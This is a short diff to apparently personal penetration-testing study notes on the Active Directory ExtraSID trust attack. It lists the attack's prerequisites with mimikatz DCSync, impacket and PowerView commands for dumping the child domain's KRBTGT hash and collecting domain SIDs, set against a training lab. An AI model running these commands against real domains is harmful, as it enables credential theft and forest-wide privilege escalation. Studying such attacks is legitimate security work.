KiritoLoveAsuna/Penetration-Testing/Active Directory Trusts Attacks.md

 IntraForest = True
 ### ExtraSID Attack
 Requires
-* The KRBTGT hash for the child domain (mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt)
+* The KRBTGT hash for the child domain (mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt)(linux:logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt)
-* The SID for the child domain (Powerview,Get-DomainSID)
+* The SID for the child domain (Powerview,Get-DomainSID)(impacket-lookupsid logistics.inlanefreight.local/htb-student_adm@172.16.5.240)
 * The name of a target user in the child domain (does not need to exist!)
 * The FQDN of the child domain.
 * The SID of the Enterprise Admins group of the root domain.(Powerview, Get-ADGroup -Identity "Enterprise Admins" -Server "INLANEFREIGHT.LOCAL")